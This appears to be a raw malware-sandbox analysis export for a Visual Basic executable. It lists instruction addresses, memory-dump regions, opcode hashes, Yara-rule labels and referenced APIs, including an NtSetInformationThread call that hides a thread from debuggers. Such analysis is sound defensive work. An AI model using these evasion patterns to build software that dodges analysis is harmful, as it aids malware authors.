0x004013e9
0x004013ea
0x004013eb
0x004013ed
0x004013ee
0x004013f3
0x004013f5
0x004013f7
0x004013f9
0x004013fb
0x004013fc
0x004013fe
0x00401401
0x00401403
0x00401405
0x00401408
0x0040140b
0x0040140c
0x0040140f
0x00401410
0x00401413
0x00401413
0x00401416
0x00401417
0x00401418
0x00401423
0x00401424
0x0040142a
0x0040142b
0x0040142c
0x0040142f
0x00401430
0x00401433
0x00401434
0x0040143f
0x00401440
0x00401442
0x00401444
0x00401446
0x00401448
0x0040144a
0x0040144c
0x0040144e
0x00401450
0x00401452
0x00401454
0x00401456
0x00401459
0x0040145b
0x0040145d
0x0040145f
0x00401461
0x00401463
0x00401465
0x00401467
0x00401469
0x0040146b
0x0040146d
0x0040146f
0x00401471
0x00401473
0x00401475
0x00401477
0x00401479
0x0040147b
0x0040147d
0x0040147f
0x00401480
0x00401482
0x00401485
0x00401487
0x00401488
0x0040148a
0x0040148d
0x0040148f
0x00401490
0x00401492
0x00401495
0x00401497
0x00401498
0x0040149a
0x0040149b
0x0040149d
0x0040149f
0x004014a1
0x004014a8
0x004014aa
0x004014ac
0x004014ae
0x004014b4
0x004014b6
0x004014bd
0x004014bf
0x004014c0
0x004014c2
0x004014c3
0x004014c5
0x004014c7
0x004014c8
0x004014ca
0x004014cb
0x004014ce
0x004014cf
0x004014d0
0x004014d6
0x004014d7
0x004014d8
0x004014db
0x004014dc
0x004014df
0x004014e0
0x004014e3
0x004014e4
0x004014ea
0x004014eb
0x004014ec
0x004014ef
0x004014f0
0x004014f3
0x004014f5
0x004014f6
0x004014fb
0x004014fc
0x004014ff
0x004014ff
0x004014ff
0x00401500
0x00401502
0x00401504
0x00401506
0x00401508
0x0040150a
0x0040150d
0x0040150f
0x00401511
0x00401513
0x00401515
0x00401517
0x0040151d
0x0040151f
0x0040151f
0x00401521
0x00401523
0x00401525
0x00401527
0x00401529
0x0040152b
0x0040152d
0x0040152f
0x00401531
0x00401533
0x00401535
0x00401537
0x00401539
0x0040153b
0x0040153d
0x0040153f
0x00401541
0x00401543
0x00401545
0x00401547
0x00401549
0x0040154b
0x0040154d
0x00401550
0x00401552
0x00401553
0x00401554
0x00401556
0x00401557
0x00401558
0x0040155a
0x0040155d
0x0040155f
0x00401560
0x00401563
0x00401564
0x00401566
0x00401567
0x00401569
0x00000000
0x00000000
0x0040156b
0x0040156c
0x0040156f
0x00401570
0x00401574
0x00401576
0x00401577
0x00401578
0x0040157a
0x0040157b
0x0040157c
0x0040157e
0x0040157f
0x00401580
0x00401582
0x00401583
0x00401585
0x00401587
0x00401589
0x00000000
0x00000000
0x0040158b
0x0040158c
0x0040158f
0x0040158f
0x00401590
0x00401594
0x00401596
0x00401597
0x00401598
0x0040159a
0x0040159b
0x0040159c
0x0040159e
0x0040159f
0x004015a1
0x004015a8
0x004015aa
0x004015ac
0x004015ad
0x004015ae
0x004015b3
0x004015b4
0x004015b7
0x004015b8
0x004015bb
0x004015bc
0x004015c2
0x004015c4
0x004015c6
0x004015c8
0x004015ca
0x004015cc
0x004015ce
0x004015d0
0x004015d2
0x004015d4
0x004015d6
0x004015d8
0x004015da
0x004015dc
0x004015de
0x004015e0
0x004015e3
0x004015e4
0x004015e7
0x004015e8
0x004015eb
0x004015ed
0x004015ef
0x004015f1
0x004015f3
0x004015f5
0x004015f7
0x004015f7
0x004015fb
0x004015fc
0x004015ff
0x00401601
0x00401602
0x00401604
0x00401606
0x00401608
0x0040160a
0x0040160c
0x0040160e
0x00401614
0x00401616
0x00401617
0x00401618
0x0040161a
0x0040161b
0x0040161c
0x0040161f
0x00401620
0x00401626
0x00401628
0x00401629
0x0040162a
0x0040162b
0x0040162d
0x00401634
0x00401636
0x00401639
0x0040163b
0x0040163c
0x0040163e
0x0040163f
0x00401640
0x00401642
0x00401645
0x00401647
0x00401649
0x0040164f
0x00401650
0x00401656
0x00401657
0x00401659
0x0040165c
0x0040165e
0x00401660
0x00401662
0x00401663
0x00401664
0x00401666
0x00401668
0x0040166a
0x0040166c
0x0040166e
0x00401670
0x00401673
0x00401674
0x00401677
0x00401678
0x0040167b
0x0040167c
0x0040167f
0x00401680
0x00401682
0x00401684
0x00401686
0x00401688
0x0040168a
0x0040168c
0x0040168e
0x00401690
0x00401692
0x00401694
0x00401696
0x00401698
0x0040169a
0x0040169c
0x0040169e
0x004016a0
0x004016a2
0x004016a4
0x004016a6
0x004016a8
0x004016aa
0x004016ac
0x004016ae
0x004016b0
0x004016b2
0x004016b4
0x004016b6
0x004016b8
0x004016ba
0x004016bc
0x004016be
0x004016c0
0x004016c2
0x004016c4
0x004016c6
0x004016c8
0x004016ca
0x004016cc
0x004016ce
0x004016d0
0x004016d2
0x004016d4
0x004016d6
0x004016d7
0x004016d8
0x004016da
0x004016db
0x004016dd
0x004016e3
0x004016e4
0x004016f0
0x004016f2
0x004016f3
0x004016f5
0x004016f8
0x004016fb
0x004016fd
0x00401700
0x00401703
0x00401705
0x0040170b
0x0040170b
0x0040170b
0x0040170c
0x0040170f
0x0040170f
0x00401710
0x00401713
0x00401714
0x00401717
0x00401718
0x0040171a
0x0040171c
0x0040171e
0x0040171f
0x00401720
0x00401722
0x00401723
0x00401725
0x00401728
0x0040172a
0x00000000
0x00000000
0x0040172c
0x0040172c
0x00401730
0x00401733
0x00401734
0x00401737
0x00401738
0x0040173a
0x0040173c
0x00401754
0x0040175a
0x0040175c
0x0040179d
0x004017d8
0x004017ef
0x00401802
0x00401809
0x0040180a
0x0040180b
0x0040180c
0x0040180d
0x0040180e
0x0040180f
0x00401810
0x00401811
0x00401814
0x00401815
0x00401816
0x00401822
0x00401829
0x0040182a
0x0040182b
0x0040182c
0x0040182d
0x0040182e
0x0040182f
0x00401830
0x00401831
0x00401833
0x00401835
0x00401836
0x00401842
0x00401849
0x0040184a
0x0040184b
0x0040184c
0x0040184e
0x0040184f
0x00401850
0x00401851
0x00401854
0x00401855
0x00401856
0x00401862
0x00401869
0x0040186a
0x0040186b
0x0040186c
0x0040186d
0x0040186e
0x0040186f
0x00401870
0x00401871
0x00401874
0x00401875
0x00401876
0x00401882
0x00401889
0x0040188a
0x0040188b
0x0040188c
0x0040188d
0x0040188e
0x0040188f
0x00401890
0x00401891
0x00401892
0x00401893
0x00401894
0x00401896
0x004018a2
0x004018a9
0x004018aa
0x004018ab
0x004018ac
0x004018ad
0x004018ae
0x004018af
0x004018b0
0x004018b1
0x004018b4
0x004018b5
0x004018b6
0x004018c2
0x004018c9
0x004018ca
0x004018cb
0x004018cc
0x004018cd
0x004018ce
0x004018cf
0x004018d1
0x004018d4
0x004018d5
0x004018d6
0x004018e5
0x004018ea
0x004018ec
0x004018ed
0x004018ee
0x004018ef
0x004018f1
0x004018f2
0x004018f3
0x00401905
0x0040190a
0x0040190b
0x0040190c
0x0040190e
0x0040190f
0x00401911
0x00401913
0x00401915
0x00401916
0x00401922
0x00401929
0x0040192a
0x0040192c
0x0040192e
0x0040192f
0x00401931
0x00401933
0x00401935
0x00401936
0x00401942
0x00401944
0x00401949
0x0040194a
0x0040194b
0x0040194c
0x0040194e
0x0040194f
0x00401951
0x00401953
0x00401955
0x00401956
0x00401962
0x00401969
0x0040196a
0x0040196b
0x0040196c
0x0040196e
0x0040196f
0x00401971
0x00401973
0x00401975
0x00401976
0x0040197a
0x0040197c
0x00401985
0x0040198a
0x0040198b
0x0040198d
0x0040198e
0x0040198f
0x00401991
0x00401993
0x00401995
0x00401996
0x004019a2
0x004019a9
0x004019ac
0x004019ae
0x004019b0
0x004019b2
0x004019b4
0x004019b5
0x004019b6
0x004019c2
0x004019c9
0x004019ca
0x004019cb
0x004019cc
0x004019ce
0x004019cf
0x004019d0
0x004019d1
0x004019d4
0x004019d5
0x004019d6
0x004019dc
0x004019de
0x004019e0
0x004019e0
0x004019e2
0x004019e9
0x004019ea
0x004019ed
0x004019ee
0x004019ef
0x004019f0
0x004019f1
0x004019f4
0x004019f5
0x004019f6
0x00401a02
0x00401a09
0x00401a0b
0x00401a0d
0x00401a0e
0x00401a0f
0x00401a10
0x00401a11
0x00401a14
0x00401a15
0x00401a16
0x00401a1e
0x00401a20
0x00401a25
0x00401a2a
0x00401a2b
0x00401a2c
0x00401a2d
0x00401a2e
0x00401a2f
0x00401a30
0x00401a31
0x00401a34
0x00401a35
0x00401a36
0x00401a3a
0x00401a42
0x00401a49
0x00401a4a
0x00401a4b
0x00401a4c
0x00401a4d
0x00401a4e
0x00401a4f
0x00401a50
0x00401a51
0x00401a54
0x00401a55
0x00401a56
0x00401a62
0x00401a69
0x00401a6a
0x00401a6b
0x00401a6c
0x00401a6d
0x00401a6e
0x00401a6f
0x00401a70
0x00401a71
0x00401a72
0x00401a73
0x00401a74
0x00401a76
0x00401a80
0x00401a82
0x00401a89
0x00401a8a
0x00401a8b
0x00401a8c
0x00401a8d
0x00401a8e
0x00401a8f
0x00401a90
0x00401a91
0x00401a94
0x00401a95
0x00401a96
0x00401aa2
0x00401aa9
0x00401aaa
0x00401aab
0x00401aac
0x00401aad
0x00401aae
0x00401aaf
0x00401ab0
0x00401ab1
0x00401ab4
0x00401ab5
0x00401ab6
0x00401afb
0x00401afd
0x00401b1a
0x00401b1c
0x00401b1e
0x00401b20
0x00401b22
0x00401b24
0x00401b26
0x00401b28
0x00401b2a
0x00401b2c
0x00401b2e
0x00401b30
0x00401b32
0x00401b34
0x00401b36
0x00401b38
0x00401b3a
0x00401b3c
0x00401b42
0x00401b44
0x00401b46
0x00401b48
0x00401b4a
0x00401b4c
0x00401b4e
0x00401b50
0x00401b52
0x00401b54
0x00401b56
0x00401b58
0x00401b5a
0x00401b5c
0x00401b5e
0x00401b60
0x00401b62
0x00401b64
0x00401b66
0x00401b68
0x00401b6a
0x00401b6d
0x00401b6f
0x00401b71
0x00401b73
0x00401b75
0x00401b77
0x00401b79
0x00401b7b
0x00401b7d
0x00401b7f
0x00401b81
0x00401b83
0x00401b85
0x00401b87
0x00401b89
0x00401b8b
0x00401b8d
0x00401b8f
0x00401b91
0x00401b93
0x00401b95
0x00401b97
0x00401b99
0x00401b9b
0x00401b9d
0x00401b9f
0x00401ba1
0x00401ba3
0x00401ba5
0x00401ba7
0x00401ba9
0x00401bab
0x00401bad
0x00401baf
0x00401bb1
0x00401bb5
0x00401bba
0x00401bbc
0x00401bbc
0x0040170b
0x0040151f
0x004014ff
0x004012d6
0x004012d7
0x004012d8
0x004012db
0x004012dd
0x004012e0
0x004012e2
0x004012e4
0x004012e5
0x004012e7
0x004012e8
0x004012ea
0x004012ec
0x004012ed
0x004012ef
0x004012f1
0x004012f3
0x004012f5
0x004012f7
0x004012f9
0x004012fb
0x004012ff
0x00401301
0x00401304
0x00401306
0x00401308
0x0040130a
0x0040130c
0x0040130f
0x00401311
0x00401312
0x00401314
0x00401316
0x00401318
0x0040131a
0x0040131c
0x0040131f
0x00401321
0x00401323
0x00401325
0x00401327
0x00401329
0x0040132d
0x00000000
0x0040132d

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401211

Strings

VB5!6&*, xrefs: 0040120C

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 821a2bbf953f72494acf7a84caab21d2959bb2242473129ecc4759b9792b4140
Instruction ID: 8a5f4d0de792410c30362e606a2644a3950b879143e5da28906eb409fa7e7d85
Opcode Fuzzy Hash: 821a2bbf953f72494acf7a84caab21d2959bb2242473129ecc4759b9792b4140
Instruction Fuzzy Hash: EC41716644E3C05FD3075B7099265817FB0AE23224B1E46EBC0C0EF5F3D26E485ACB66

Uniqueness

Uniqueness Score: -1.00%

Function 02320AA5, Relevance: 1.8, APIs: 1, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 671eb3f22e9fef8e76163da60c46c402c4b1db69f48218cf2e456dad2902afd9
Instruction ID: 684aa1d25f61ed38751e0124fe4299c11ae881c647af43b1fead9260ec3e8d04
Opcode Fuzzy Hash: 671eb3f22e9fef8e76163da60c46c402c4b1db69f48218cf2e456dad2902afd9
Instruction Fuzzy Hash: 08A1AD306003769AEF352D2889D47FE226F5F927A0F64053EDCCA97582DB65C4CE8952

Uniqueness

Uniqueness Score: -1.00%

Function 02320B8E, Relevance: 1.8, APIs: 1, Instructions: 318COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,00000000,?,00001000), ref: 02323B4E

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: d3cd578d1928642fa71b1d7745aa958ada91ffd4e6f320e41dde10aaee710391
Instruction ID: 4ee01c4262a27bd9f1a1d80df2139f339ff04b871faac26a9a4b44ff27ee5fcd
Opcode Fuzzy Hash: d3cd578d1928642fa71b1d7745aa958ada91ffd4e6f320e41dde10aaee710391
Instruction Fuzzy Hash: F591AF30600327AAEF35296889D47FE222F5F927A0F64053DDCCA97582DB65C4CE8912

Uniqueness

Uniqueness Score: -1.00%

Function 02320B28, Relevance: 1.8, APIs: 1, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7355e34e26bde534a58e900a8554e040a39cbb70e8427ab3495b2403030e03ff
Instruction ID: a2fa61e25b9e7515d1bbfe13ff944e3cd7675bed322a5173f07d9e2bb76c20bd
Opcode Fuzzy Hash: 7355e34e26bde534a58e900a8554e040a39cbb70e8427ab3495b2403030e03ff
Instruction Fuzzy Hash: 4C91CE30600327AAEF352D2889D47FE222F5F927A0F64053EDCCAD7482DB65C4CE8952

Uniqueness

Uniqueness Score: -1.00%

Function 02320B7C, Relevance: 1.8, APIs: 1, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcfa0bc1ee9ce2f5ef1da59bd37ecea378a3582a78ab83f7e676259529cfba12
Instruction ID: 1ecc22126d3559ad902c66c5f395de06017fe8c0f774b16330e0454acc683fe7
Opcode Fuzzy Hash: dcfa0bc1ee9ce2f5ef1da59bd37ecea378a3582a78ab83f7e676259529cfba12
Instruction Fuzzy Hash: 6E81AF30740327A9EF35296849E47FE522F5F927A0F64053ADCCA974C2DB65C4CE8952

Uniqueness

Uniqueness Score: -1.00%

Function 02320C02, Relevance: 1.8, APIs: 1, Instructions: 286COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,00000000,?,00001000), ref: 02323B4E

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: bfbea310e2d29e886a7cd92eda5172077db6a07b28e0f8c3fd24fe231de1da93
Instruction ID: c1bfcb7e977cbba4d550c91e893c690bf8a5b55c76b4e4ce1009aca171a65c7a
Opcode Fuzzy Hash: bfbea310e2d29e886a7cd92eda5172077db6a07b28e0f8c3fd24fe231de1da93
Instruction Fuzzy Hash: D9819F306403279AEF35296C89D47FE226F5F927A0F64052EDCCA975C2DB65C4CE8912

Uniqueness

Uniqueness Score: -1.00%

Function 02320CCF, Relevance: 1.8, APIs: 1, Instructions: 262COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,00000000,?,00001000), ref: 02323B4E

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 26c23c6161a1d682a7caa8d35dedc0a1455767719db59178e307325c1db638a6
Instruction ID: fa3e3d7dc7a86c62c33722db184caf1154fbd43fd2373a6e094189bcfcefbba7
Opcode Fuzzy Hash: 26c23c6161a1d682a7caa8d35dedc0a1455767719db59178e307325c1db638a6
Instruction Fuzzy Hash: C2718D306003269AEF352D6C89E47FE536B5F827A0F64052EDCCA975C2D766C4CE8902

Uniqueness

Uniqueness Score: -1.00%

Function 02320CA0, Relevance: 1.8, APIs: 1, Instructions: 259COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,00000000,?,00001000), ref: 02323B4E

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 8e0b6382020f0f247233ca08c85ffeb7e6018cccbb41dea72d7a1786270cd5ba
Instruction ID: cf0481c328362f90c7fd022f7bece54ed975f0288d8562de9e142a47ba4b2769
Opcode Fuzzy Hash: 8e0b6382020f0f247233ca08c85ffeb7e6018cccbb41dea72d7a1786270cd5ba
Instruction Fuzzy Hash: 2971BE30640327AAEF35296C49E47FE526F5F837A0F64052EDCCA9B4C2D766C48E8913

Uniqueness

Uniqueness Score: -1.00%

Function 02320D28, Relevance: 1.8, APIs: 1, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c2387d25c6e6a84115f135ec4a43bf1d36fb902fea8e0536082533e1efbe20f
Instruction ID: 5c1e3350c34238cf6bd8e85cf7d21c71b5617f82985c35d48b4109d370dad6f9
Opcode Fuzzy Hash: 3c2387d25c6e6a84115f135ec4a43bf1d36fb902fea8e0536082533e1efbe20f
Instruction Fuzzy Hash: 7F71A03060432AAAEF352D6C59A47FE136F5F937A0F64012EDCCA975C2D766C48EC912

Uniqueness

Uniqueness Score: -1.00%

Function 02320D48, Relevance: 1.7, APIs: 1, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5dc3ae5d5b5d90bcbeb39bf86650024bcb848c5dd227cba09f8afd83d1d7ded
Instruction ID: 2902239bceab1058f2c677d2f5c47a5da9346a6d32c90f3a56465e86f2f5ad3b
Opcode Fuzzy Hash: c5dc3ae5d5b5d90bcbeb39bf86650024bcb848c5dd227cba09f8afd83d1d7ded
Instruction Fuzzy Hash: CC619F30640366AAEF352D6C59E47FE126F5F837A0F64012EDCCA975C2DB66C48E8912

Uniqueness

Uniqueness Score: -1.00%

Function 02320D98, Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,00000000,?,00001000), ref: 02323B4E

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 2e5784777f0e271d38e2a3c78e0b2c6a0cda44bca5b146bf9570b148b8b37efc
Instruction ID: cf7666748898f04d7fa44fd35420377d9919c16b677afd376296354c90ad8ee5
Opcode Fuzzy Hash: 2e5784777f0e271d38e2a3c78e0b2c6a0cda44bca5b146bf9570b148b8b37efc
Instruction Fuzzy Hash: D1618030600366AEEF352D6859E47EE126F5F837A0F64052DDCCA975C2DB66C48E8912

Uniqueness

Uniqueness Score: -1.00%

Function 02320E14, Relevance: 1.7, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,00000000,?,00001000), ref: 02323B4E

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 76160d185e2c20b1163b4781ab8809ed6cca7929dc6f30d88a354bddc2fc7ebb
Instruction ID: 97d394ee5306d3b7b8d20c2298d3a65b3505b40683d67f47af70de15b453f6ed
Opcode Fuzzy Hash: 76160d185e2c20b1163b4781ab8809ed6cca7929dc6f30d88a354bddc2fc7ebb
Instruction Fuzzy Hash: 0451AD30700326AAEF352D6899E57FE122F5F837A0F64052DDCCA975C2D766C48EC912

Uniqueness

Uniqueness Score: -1.00%

Function 02320EB8, Relevance: 1.7, APIs: 1, Instructions: 188COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,00000000,?,00001000), ref: 02323B4E

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 19a12f80141846877ad6a9f88ca8299e45f9bd3e635452f56bd890104f850496
Instruction ID: ad5aa81995ce737de1d4b79a1ce624fe6eba0d9d455482369ffe6b5ae02597e2
Opcode Fuzzy Hash: 19a12f80141846877ad6a9f88ca8299e45f9bd3e635452f56bd890104f850496
Instruction Fuzzy Hash: 17519E30704366AAEF35291899E47FE126B5F837A0F74052DECCE975C2D765C48E8912

Uniqueness

Uniqueness Score: -1.00%

Function 02320F24, Relevance: 1.7, APIs: 1, Instructions: 175COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,00000000,?,00001000), ref: 02323B4E

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 2c67c6ac6bc32f1140bba60f0b2f4e06c3d531fc9e6d8c8ed079805d99bdc366
Instruction ID: ad53d0a9aeebe4a0c7c4cfc693b11550df6bd69e64c330acd0de4b36cc77cb43
Opcode Fuzzy Hash: 2c67c6ac6bc32f1140bba60f0b2f4e06c3d531fc9e6d8c8ed079805d99bdc366
Instruction Fuzzy Hash: D051A0307003669AFF35292C99D57FE126B5F837A0F64052DDCCA975C3C766C48D8912

Uniqueness

Uniqueness Score: -1.00%

Function 02320FB8, Relevance: 1.6, APIs: 1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4d82f4b4e89e9812c1e874ce6bee19d95c0b08fd491443a3e8a6eae97add2ce
Instruction ID: 8c1c8d608eec6db0ce0c35e70f31a9c59a4d350328aa17a04870f25c1cdc8d30
Opcode Fuzzy Hash: d4d82f4b4e89e9812c1e874ce6bee19d95c0b08fd491443a3e8a6eae97add2ce
Instruction Fuzzy Hash: 22418B306043669AEF34292C8AD97FE636B5F837A0F64052DDCCAD7583C76AC48D8942

Uniqueness

Uniqueness Score: -1.00%

Function 0232103C, Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,00000000,?,00001000), ref: 02323B4E

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: bed13a27462f719aea13eae91278c8700551dedbe8260ca44dfdf72f7233e3ad
Instruction ID: 32f83d9c9cc3f6c8d17d5fd8eba525af47ac9cf7df42e5fb51ecb72ebddbddff
Opcode Fuzzy Hash: bed13a27462f719aea13eae91278c8700551dedbe8260ca44dfdf72f7233e3ad
Instruction Fuzzy Hash: E631AB3020432699EF342D2C4AD87FE666B6F82790F34062DDCC9DA5C3C766C48D8903

Uniqueness

Uniqueness Score: -1.00%

Function 0232116C, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,00000000,?,00001000), ref: 02323B4E

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 816fcc72e2ac507f6d26614172e5645cf3f0fa64f5ef5e1e81da1903ccb769c6
Instruction ID: 5ed87f17f3b60a5015f17a7b2be29d32f19916404d8f2e9849d5b83c1216cc13
Opcode Fuzzy Hash: 816fcc72e2ac507f6d26614172e5645cf3f0fa64f5ef5e1e81da1903ccb769c6
Instruction Fuzzy Hash: EC216B306083659AFF315E288A947BE229A5F42B14F24436DEC8D9A1C3C766C44DCA52

Uniqueness

Uniqueness Score: -1.00%

Function 023211BC, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,00000000,?,00001000), ref: 02323B4E

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: f6ae2d568bc3b778ed5f6123bdd9a0bb1abff4d92757c0be1da823103e4424a8
Instruction ID: 95fed2daa8537435e1424195daeeab074131ac2ea4eb81566ac1dded741700d1
Opcode Fuzzy Hash: f6ae2d568bc3b778ed5f6123bdd9a0bb1abff4d92757c0be1da823103e4424a8
Instruction Fuzzy Hash: 35115C306083A599FF312A288E947BE559B5F42764F64432EECDD855C3C76AC08CC953

Uniqueness

Uniqueness Score: -1.00%

Function 0232121C, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,00000000,?,00001000), ref: 02323B4E

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 3c78057cdac669fa5a4d3c1e13d7a61bfb24ca6ee31820c1f44e6fc8278018ac
Instruction ID: ac5e6a6b83b8d6772774b7124d8a62a1b02403eefea4815dc1720609de90721e
Opcode Fuzzy Hash: 3c78057cdac669fa5a4d3c1e13d7a61bfb24ca6ee31820c1f44e6fc8278018ac
Instruction Fuzzy Hash: 8E112B306043A1D9EF316E2889943AE26DA5F42754F24421DDCCD855C2C366C04CCE23

Uniqueness

Uniqueness Score: -1.00%

Function 02326784, Relevance: 1.5, APIs: 1, Instructions: 40libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,023203F7,00000000), ref: 02326846

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 73d3b30230a6a35d13920c53f2565d04909f95207cc0e8977da5fc8dcfc54f5d
Instruction ID: e027d3cdb7614738fdf9dfabfca742b35a4dc6c9c0a6dd840b6fd43d61ffaf57
Opcode Fuzzy Hash: 73d3b30230a6a35d13920c53f2565d04909f95207cc0e8977da5fc8dcfc54f5d
Instruction Fuzzy Hash: CDF0B4B46516697ADF303B759C86BDE2A7ECF05761F94420BEC11D7084C72484CC8E93

Uniqueness

Uniqueness Score: -1.00%

Function 0232065B, Relevance: 1.5, APIs: 1, Instructions: 39nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(023206F0,?,00000000,?,?,?,?,?,?,?,02320375), ref: 023206CD
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: ef4e2a5bfcf85be934b0c82ce39c4cc9f1f96e5e942ea3a13efc8f3147381314
Instruction ID: 5101759a14194cfaec444f447f3be816753240b3681c4ac28bb66a0a7107d211
Opcode Fuzzy Hash: ef4e2a5bfcf85be934b0c82ce39c4cc9f1f96e5e942ea3a13efc8f3147381314
Instruction Fuzzy Hash: B5F02B395053205FCB64DE28C89479A37A6EF56324F50050DDCD99B181CB31C8CECF05

Uniqueness

Uniqueness Score: -1.00%

